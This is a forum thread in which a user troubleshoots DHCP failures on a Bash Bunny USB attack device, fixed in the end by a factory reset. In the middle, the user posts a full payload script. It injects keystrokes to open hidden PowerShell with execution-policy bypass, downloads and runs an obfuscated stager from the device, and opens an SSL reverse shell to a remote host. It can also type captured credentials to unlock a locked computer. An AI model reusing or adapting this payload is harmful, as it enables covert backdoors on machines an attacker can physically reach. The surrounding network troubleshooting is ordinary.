Unable to get DHCP ip address from the bunny

[catx0rr]

So I was trying to test out my payload, and since it was hosted on the bb, i have to spin a python http server. Also, have to do the mount -o sync /dev/nandf /root/udisk. in order to pull up the payload on the bunny.

Issue is i cant even ssh in on the bash bunny cause it gives me apipa ip address (169.254..) on switch 1. switch 2 seems to be fine, and it was stucked on 172.16.64.64 (where you have to set it for internet sharing.

Is there any other way to fix this? or refresh/flush the network configuration.

 

Ethernet adapter Ethernet 7: (bashbunny switch 1)

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::f279:314a:12a0:7a90%26
   Autoconfiguration IPv4 Address. . : 169.254.220.6
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . :

Snippet, start of payload where it should go to RNDIS_ETHERNET and HID attack

...<snip>...

# Prepare the bunny
LED M 250
ATTACKMODE RNDIS_ETHERNET HID

# Sync and mount drive to bashbunny
# wait for mounting before sourcing
mount -o sync /dev/nandf /root/udisk
sleep 5
# Sourcing extension dependencies:
# sourced scripts or helpers are stored in the shell session

SRC_DIR=/root/udisk/payloads/extensions/
source $SRC_DIR/get.sh
source $SRC_DIR/get2_dhclient.sh

GET SWITCH_POSITION

...<snip>...

[catx0rr]

Inside the switch1 directory files reside:

.dev.log => (which are my notes for updating)

.gitignore => .dev.log

modules => a directory which is also sourced

payload.txt => the payload.txt

readme.txt => short description for the payload

Is the bunny reading it wrong? I was wondering if the readme.txt would affect the payload execution (mess it up) or whatever..
 

[catx0rr]

Update:

I was able to fix a couple of bugs, (due to typo) errors. So now, what I am trying to achieve to get IP from bunny DHCP.. I am still getting an APIPA (which is the major issue as stated)

So the payload runs like this:

ATTACKMODE RNDIS_ETHERNET => should spin up its DHCP and host will acquire an ip (usually 172.16.64.1-10).. (but to no avail, getting 169.254...)
Then it loads up get.sh as source and get2_dhclient.sh on the extensions directory, and:
GET TARGET_HOSTNAME => (But due to apipa, it cannot.. )
GET TARGET_IP => (But due to apipa, it cannot..)
GET HOST_IP => it can get its own dhcp ip address.

Then it will spin up python http server on port 80.
Host should download and execute a payload from the memory its from the server. (bunny)..

[dark_pyrro]

Mounting the udisk that way isn't necessary, the easiest way is just to run
udisk mount

Sourcing the get commands shouldn't be necessary either, it's a part that's already taken care of by bunny_framework

It's a lot easier to troubleshoot if the full payload is posted. Of course, if there is some super secret stuff in it, that can be left out, but just getting glimpses is just adding fog to the landscape

[catx0rr]

nothing super secret stuff included, just a bunch of automation commands included on the main script so i guess that should be fine.

I was able to fix the issues by debugging.. the only issue i have is the DHCP server of the bunny.  Just a recap, the usual behavior is, the host will acquire IP from the bunny DHCP right? then you may access the console by going to 172.16.64.1 (as usual)

Also, I was using an old bashbunny device (Mark I) i think.. with updated firmware to 1.6

If the DHCP service has an issue is there a way i can reconfigure it? I also updated the packages from the repository, you may wonder i have python3 installed in it.

I just want to add as well that I tried internet sharing. since then (172.16.64.64) ip was stucked on the host (in case of switch 2).. and APIPA on switch 1. Vice versa, when i put the payload on switch 2, it will get an APIPA IP and switch 1 will get the 172.16.64.64 IP (DHCP) automatic set ip address..

# Setup HID attack modules:

# User may have a different language keyboard

# setup ducky_lang script language here.

DUCKY_LANG=us

LED M 250

ATTACKMODE RNDIS_ETHERNET HID

 

# Sync and mount drive to bashbunny

# wait for mounting before sourcing

mount -o sync /dev/nandf /root/udisk

sleep 5

# Sourcing extension dependencies:

# sourced scripts or helpers are stored in the shell session

 

SRC_DIR=/root/udisk/payloads/extensions

source $SRC_DIR/get.sh

source $SRC_DIR/get2_dhclient.sh

 

GET SWITCH_POSITION

 

# Sourcing payload modules

 

MODULE_SRC=/root/udisk/payloads/$SWITCH_POSITION/modules

source $MODULE_SRC/logging.sh

source $MODULE_SRC/shellgen.sh

 

# Directory for local data dumps of the payload

# The default directory can bee seen upon connecting to bash bunny in

# arming mode or using serial or ssh connection.

 

LOG_DIR=/root/udisk/logs/

LOG_NAME="pwsh-ssl-debug.log"

 

# HTTP Server configuration

# In case that you needed to change the default port in serving the payload

HTTP_PORT=80

 

# Credentials:

# This can be enabled if you have obtained a valid

# plaintext credentials on the target host, or captured adomain account.

# This can be leveraged through lock computers and automatically unlock them

# when HID attack starts. Enable CREDENTIALS to 1 and supply creds to

# automate the attack.

 

CREDENTIALS=0

USERNAME=""

PASSWORD=""

 

# Domain or Workgroup:

# The target windows host might be domain joined or not, if not

# It may not be configured to enter username at lock/login screen.

# to not mess up the execution, configure the selected target here.

# If WORKGROUP is set to 0, the script will assume the target is a domain joined host.

# This option will only work if credentialed HID attack is set to 1. (above)

 

WORKGROUP=1

 

# Remote Host:

# Executes the payload and returns a callback to target remote host.

 

REMOTE_HOST="192.168.0.100"

REMOTE_PORT="443"

 

function setup_server()

{

  LED C 250

  # Go to module source path

  cd $MODULE_SRC

 

  LOGEVENT "$LOG_DIR" "$LOG_NAME" "Starting up services.."

 

  # Disallow outgoing DNS requests (bashbunny)

  iptables -A OUTPUT -p udp --dport 53 -j DROP; sleep 2

  LOGEVENT "$LOG_DIR" "$LOG_NAME" "Disabled udp port 53 for faster resolution.."

 

  # check if python3 is installed

  if [[ ! -f $(which python3) ]]; then

    LOGEVENT "$LOG_DIR" "$LOG_NAME" "Python3 is not installed. Aborting payload execution.."

    LED R 50; sleep 5

    LED R SOLID

    exit

  fi

 

  # execute HTTP server and wait for at least 3 seconds

  python3 -m http.server $HTTP_PORT &

  sleep 3

 

  # check for listening port

  if [[ $(netstat -plnt | grep $HTTP_PORT | awk {'print $6'}) == "LISTEN" ]]; then

    LOGEVENT "$LOG_DIR" "$LOG_NAME" "Python http server has successfully started.. Listening on port $HTTP_PORT.."

    LED C 50; sleep 3

    LED C SOLID

  else

    LOGEVENT "$LOG_DIR" "$LOG_NAME" "Python http server encountered an error.. Aborting payload execution.."

    LED R 50 ; sleep 5

    LED R SOLID

    exit

  fi

}

 

function create_payload()

{

  LED B 250 ; sleep 2

  LOGEVENT "$LOG_DIR" "$LOG_NAME" "Creating a unique ssl enabled reverse shell payload.."

  GENERATE_PAYLOAD "$REMOTE_HOST" "$REMOTE_PORT" "$MODULE_SRC" "$MODULE_SRC"

  # check for generated payload

  CHECK_PAYLOAD=$(ls | grep -E '^[a-z]{1}\.ps1$')

  if [[ $CHECK_PAYLOAD ]]; then

    LOGEVENT "$LOG_DIR" "$LOG_NAME" "Payload successfully created.. File stored in $MODULE_SRC/$PAYLOAD.."

    LOGEVENT "$LOG_DIR" "$LOG_NAME" "Payload has a md5 signature value of $(cat $MODULE_SRC/$PAYLOAD | md5sum | tr -d "-" | tr -d " " | tr -d "\n").."

    LED B 50 ; sleep 3

    LED B SOLID

    PAYLOAD=$CHECK_PAYLOAD

  else

    LOGEVENT "$LOG_DIR" "$LOG_NAME" "Could not detect created payload.. Aborting HID attack.."

    LED R 50; sleep 5

    LED R SOLID

    exit

 fi

}

 

function start_hid_attack()

{

  LED Y 250 ; sleep 3

  LED Y 50 ; sleep 2

  # Get bb variables, setting up attack

  GET HOST_IP

  GET TARGET_IP

  GET TARGET_HOSTNAME

  sleep 2

  # Modify stager to point to the created payload

  sed -i "s/[a-z]\.ps1/$PAYLOAD/" $MODULE_SRC/stager.ps1

  sleep 2

  # Just ensure dynamic ip addressing set instead

  sed -i "s/[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/$HOST_IP/" stager.ps1

  sleep 3

  LOGEVENT "$LOG_DIR" "$LOG_NAME" "Starting HID attack on the target host, $TARGET_HOSTNAME with an IP of ($TARGET_IP).."

 

  # Start DuckyScript HID attack (unlocked PC), executes stager and execute reverse shell (fileless)

  # Ensure that the listener on the remote host is already started.

  Q DELAY 1500

  Q GUI r

  Q DELAY 500

  Q STRING "pOwErShElL -NoP -nOLoGo -nONi -w h -eP bYpAsS"

  Q DELAY 300

  Q ENTER

  Q DELAY 500

  Q STRING "iE''x(i''W'R' -uRi ('h'+'ttp'+'://'+'$HOST_IP'+':$HTTP_PORT/stager.ps1'))"

  Q DELAY 300

  Q ENTER

  Q DELAY 500

  LOGEVENT "$LOG_DIR" "$LOG_NAME" "$PAYLOAD has been executed.. If properly configured, it should sucessfully created a ssl shell backdoor on the remote host ($REMOTE_HOST).."

  LED G 50; sleep 5

  LED G SOLID

}

 

function clean_up

{

  LED W 50 ; sleep 5

  # Remove unique payload from the modules directory

  LOGEVENT "$LOG_DIR" "$LOG_NAME" "Cleaning up $PAYLOAD.. in $MODULE_SRC directory.."

  sleep 6

  sleep 2

  DELAY 1000

  Q GUI r

  Q DELAY 500

  Q STRING "pOwErShElL -NoP -nOLoGo -nONi -w h -eP bYpAsS"

  Q DELAY 300

  Q ENTER

  Q DELAY 500

  Q STRING "iE''x(i''W'R' -uRi ('h'+'ttp'+'://'+'$HOST_IP'+':$HTTP_PORT/cleanup.ps1'))"

  Q DELAY 300

  Q ENTER

  Q DELAY 500

  LOGEVENT "$LOG_DIR" "$LOG_NAME" "Successfully cleaned up attack..\n"

  sleep 7

  rm -rf $MODULE_SRC/$PAYLOAD

  sleep 2 ; sync sleep 1

  LED G SOLID

}

 

function main()

{

  setup_server

  create_payload

  start_hid_attack

  clean_up

}

 

main

[dark_pyrro]

Try creating a simple and small payload that just contains the following in order to rule out any other issues with the rest of your payload. I've never had any issues using the extensions and I just ran the payload below on a Win11 box and it was successful. If it isn't successful, then try it on other Windows machines if possible.

ATTACKMODE RNDIS_ETHERNET

LED ATTACK

GET SWITCH_POSITION
GET HOST_IP
GET TARGET_IP

echo $SWITCH_POSITION > /root/extensiontest.log
echo $HOST_IP >> /root/extensiontest.log
echo $TARGET_IP >> /root/extensiontest.log

LED FINISH

 

[catx0rr]

3 minutes ago, dark_pyrro said:

Try creating a simple and small payload that just contains the following in order to rule out any other issues with the rest of your payload. I've never had any issues using the extensions and I just ran the payload below on a Win11 box and it was successful. If it isn't successful, then try it on other Windows machines if possible.

ATTACKMODE RNDIS_ETHERNET

LED ATTACK

GET SWITCH_POSITION
GET HOST_IP
GET TARGET_IP

echo $SWITCH_POSITION > /root/extensiontest.log
echo $HOST_IP >> /root/extensiontest.log
echo $TARGET_IP >> /root/extensiontest.log

LED FINISH

 

Thanks @dark_pyrro Will try to check on this after I get back. Just need to do some errands. And will update you in regards.

Also, upon setting the IP to static, (172.16.64.64) i was able to ssh in to the bunny. And found this:

might be checking dhcp errors later.. 

[dark_pyrro]

You should for sure not get any DHCP daemon errors like that. Have you changed something related to the dhcpd config at some point?

[dark_pyrro]

Also, for some reason, port 53 is blocked in the payload using iptables. Try to run the payload without blocking that port.

[catx0rr]

I think i found the error on the dhcp config..

So far what I can remember, i think this has to do with me updating the whole apt-upgrade packages.. and overwritten with the Y/N configuraion files.. etc.. Maybe there is no values on the dhcp conf or something thats why..  In case, can i request for the default conf for the dhcp?
 

[catx0rr]

here's the contents of /etc/dhcp/dhcpd.conf..

---------------------

root@bunny:/var/log# cat /etc/dhcp/dhcpd.conf
# dhcpd.conf
#
# Sample configuration file for ISC dhcpd
#

# option definitions common to all supported networks...
option domain-name "example.org";
option domain-name-servers ns1.example.org, ns2.example.org;

default-lease-time 600;
max-lease-time 7200;

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
#log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

#subnet 10.152.187.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.254.239.0 netmask 255.255.255.224 {
#  range 10.254.239.10 10.254.239.20;
#  option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;
#}

# This declaration allows BOOTP clients to get dynamic addresses,
# which we don't really recommend.

#subnet 10.254.239.32 netmask 255.255.255.224 {
#  range dynamic-bootp 10.254.239.40 10.254.239.60;
#  option broadcast-address 10.254.239.31;
#  option routers rtr-239-32-1.example.org;
#}

# A slightly different configuration for an internal subnet.
#subnet 10.5.5.0 netmask 255.255.255.224 {
#  range 10.5.5.26 10.5.5.30;
#  option domain-name-servers ns1.internal.example.org;
#  option domain-name "internal.example.org";
#  option routers 10.5.5.1;
#  option broadcast-address 10.5.5.31;
#  default-lease-time 600;
#  max-lease-time 7200;
#}

# Hosts which require special configuration options can be listed in
# host statements.   If no address is specified, the address will be
# allocated dynamically (if possible), but the host-specific information
# will still come from the host declaration.

#host passacaglia {
#  hardware ethernet 0:0:c0:5d:bd:95;
#  filename "vmunix.passacaglia";
#  server-name "toccata.example.com";
#}

# Fixed IP addresses can also be specified for hosts.   These addresses
# should not also be listed as being available for dynamic assignment.
# Hosts for which fixed IP addresses have been specified can boot using
# BOOTP or DHCP.   Hosts for which no fixed address is specified can only
# be booted with DHCP, unless there is an address range on the subnet
# to which a BOOTP client is connected which has the dynamic-bootp flag
# set.
#host fantasia {
#  hardware ethernet 08:00:07:26:c0:a5;
#  fixed-address fantasia.example.com;
#}

# You can declare a class of clients and then do address allocation
# based on that.   The example below shows a case where all clients
# in a certain class get addresses on the 10.17.224/24 subnet, and all
# other clients get addresses on the 10.0.29/24 subnet.

#class "foo" {
#  match if substring (option vendor-class-identifier, 0, 4) = "SUNW";
#}

#shared-network 224-29 {
#  subnet 10.17.224.0 netmask 255.255.255.0 {
#    option routers rtr-224.example.org;
#  }
#  subnet 10.0.29.0 netmask 255.255.255.0 {
#    option routers rtr-29.example.org;
#  }
#  pool {
#    allow members of "foo";
#    range 10.17.224.10 10.17.224.250;
#  }
#  pool {
#    deny members of "foo";
#    range 10.0.29.10 10.0.29.230;
#  }
#}

---------------------------------------

and for the dhclient.conf

---------------------------------------

root@bunny:/var/log# cat /etc/dhcp/dhclient.conf
# Configuration file for /sbin/dhclient.
#
# This is a sample configuration file for dhclient. See dhclient.conf's
#       man page for more information about the syntax of this file
#       and a more comprehensive list of the parameters understood by
#       dhclient.
#
# Normally, if the DHCP server provides reasonable information and does
#       not leave anything out (like the domain name, for example), then
#       few changes must be made to this file, if any.
#

option rfc3442-classless-static-routes code 121 = array of unsigned integer 8;

send host-name = gethostname();
request subnet-mask, broadcast-address, time-offset, routers,
        domain-name, domain-name-servers, domain-search, host-name,
        dhcp6.name-servers, dhcp6.domain-search, dhcp6.fqdn, dhcp6.sntp-servers,
        netbios-name-servers, netbios-scope, interface-mtu,
        rfc3442-classless-static-routes, ntp-servers;

#send dhcp-client-identifier 1:0:a0:24:ab:fb:9c;
#send dhcp-lease-time 3600;
#supersede domain-name "fugue.com home.vix.com";
#prepend domain-name-servers 127.0.0.1;
#require subnet-mask, domain-name-servers;
#timeout 60;
#retry 60;
#reboot 10;
#select-timeout 5;
#initial-interval 2;
#script "/sbin/dhclient-script";
#media "-link0 -link1 -link2", "link0 link1";
#reject 192.33.137.209;

#alias {
#  interface "eth0";
#  fixed-address 192.5.5.213;
#  option subnet-mask 255.255.255.255;
#}

#lease {
#  interface "eth0";
#  fixed-address 192.33.137.200;
#  medium "link0 link1";
#  option host-name "andare.swiftmedia.com";
#  option subnet-mask 255.255.255.0;
#  option broadcast-address 192.33.137.255;
#  option routers 192.33.137.250;
#  option domain-name-servers 127.0.0.1;
#  renew 2 2000/1/12 00:00:01;
#  rebind 2 2000/1/12 00:00:01;
#  expire 2 2000/1/12 00:00:01;
#}
root@bunny:/var/log#

-----------------------------------

[dark_pyrro]

That does not look like the default conf file. No surprise that it doesn't work really.

I could post the original file, but if you have done an upgrade, there might be more relevant files that are crap. I'd recommend a factory reset instead.

[catx0rr]

@dark_pyrro, hey thanks. I think the .conf file could restore the dhcp config by just adding the configuration below. The service is failing because I assume it was misconfigured and the bunny defaults was looking on the dhcpd.conf file to specify its subnet range in order for it to properly work. We could've tried at least, but it was fixed by the factory reset, also done with firmware update. Its just that I lost all the apt packages and upgrades on the bunny. Still, main thing is it was all sorted out, and I can work over here. Thanks again.

The only part that I might needed to add on the dhcpd.conf